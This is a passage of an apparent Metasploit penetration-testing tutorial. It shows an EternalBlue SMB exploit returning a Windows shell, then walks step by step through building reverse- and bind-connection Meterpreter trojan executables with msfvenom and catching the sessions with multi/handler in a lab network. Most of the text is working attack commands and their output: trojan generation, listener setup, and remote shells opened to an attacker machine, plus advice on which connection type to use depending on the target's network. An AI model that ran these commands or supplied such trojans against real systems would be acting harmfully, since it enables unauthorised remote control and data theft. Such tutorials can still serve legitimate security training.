[+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32>
The exploit has returned a Windows cmd shell.
5. Backgrounding the session
C:\Windows\system32>background
Background session 1? [y/N]  y
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...

C:\Windows\system32>
background sends an established session to the background; the Ctrl+Z shortcut does the same.
sessions -i 1 brings the session back to the foreground.
All sessions can be listed:
msf5 > sessions

Active sessions
===============

  Id  Name  Type               Information                                                                        Connection
  --  ----  ----               -----------                                                                        ----------
  1         shell x64/windows  Microsoft Windows [_ 6.1.7600] _ (c) 2009 Microsoft Corporation_ C:\Windows\s...  192.168.4.146:4444 -> 192.168.4.142:49158 (192.168.4.142)
sessions can be used at the msf prompt, or at the prompt after use of an exploit, to view existing sessions; sessions -i ID switches to the corresponding shell.
V. Trojan penetration 1 (reverse connection)
1. Generating a trojan (reverse connection type)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.4.146 LPORT=4444 -f exe > trojan_backward.exe
msfvenom generates a trojan program named trojan_backward.exe. The payload used is windows/meterpreter/reverse_tcp, a reverse-connection payload; LHOST is the IP address of our attacking machine and LPORT is the attacking machine's port (the port we need to listen on).
2. Listening for the connection in msf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 192.168.4.146
LHOST => 192.168.4.146
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.4.146:4444
Set the local (attacking) machine's IP address and the port to listen on (this port is already embedded in the generated trojan, which will actively connect to it).
3. Copying the trojan to the target and running it (firewall and AV temporarily disabled)
After the trojan runs on the target, a connection to the attacking machine's listening port 4444 appears and a shell is returned:
[*] Started reverse TCP handler on 192.168.4.146:4444
[*] Sending stage (180291 bytes) to 192.168.4.199
[*] Meterpreter session 1 opened (192.168.4.146:4444 -> 192.168.4.199:9018) at 2020-04-21 05:00:08 -0400

meterpreter >
At this meterpreter prompt, help lists the available operations, for example the ipconfig command or the screenshot command (screen capture).
4. Using the 64-bit version
The payload used by default above is the 32-bit version; for 64-bit, use windows/x64/meterpreter/reverse_tcp.
Note: if the trojan was generated with a 64-bit payload, then after use exploit/multi/handler in msf the following command must also be used to select the matching 64-bit payload:
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
All other steps are the same as for 32-bit.
Summary: the payload the trojan was built with must match the payload set in msf. This applies to every payload.
VI. Trojan penetration 2 (bind connection)
1. Generating a trojan (bind connection type)
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.4.199 LPORT=5555 -f exe > trojan_forward.exe
Note that LHOST here differs from reverse_tcp: it is the target machine's IP address, and LPORT is the port the target listens on.
2. Connecting to the trojan from msf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     5555             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set RHOST 192.168.4.199
RHOST => 192.168.4.199
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 4444
msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against 192.168.4.199:5555
This again starts with exploit/multi/handler; the difference from the reverse-connection case is that the payload type must be set by hand, here windows/meterpreter/bind_tcp.
Then set RHOST to the target's IP address and LPORT to the port the target listens on, 5555. Once the trojan is executed by the target's user, it listens on port 5555 and waits for msf on the attacking machine to connect.
3. Running the trojan on the target
The trojan can also be run on the target before msf connects to it (the result is the same).
After the trojan runs (listening on the target's port 5555), msf reports a successful connection:
[*] Started bind TCP handler against 192.168.4.199:5555
[*] Sending stage (206403 bytes) to 192.168.4.199
[*] Meterpreter session 2 opened (192.168.4.146:41015 -> 192.168.4.199:5555) at 2020-04-21 05:05:42 -0400

meterpreter >
All remaining operations are the same as for the reverse connection.
The choice between bind and reverse connections depends mainly on the network layout: if the attacking machine is on the public internet (reachable by the target) and the target is on a LAN, a reverse connection can be used; if the target is on the public internet, a bind connection can be used.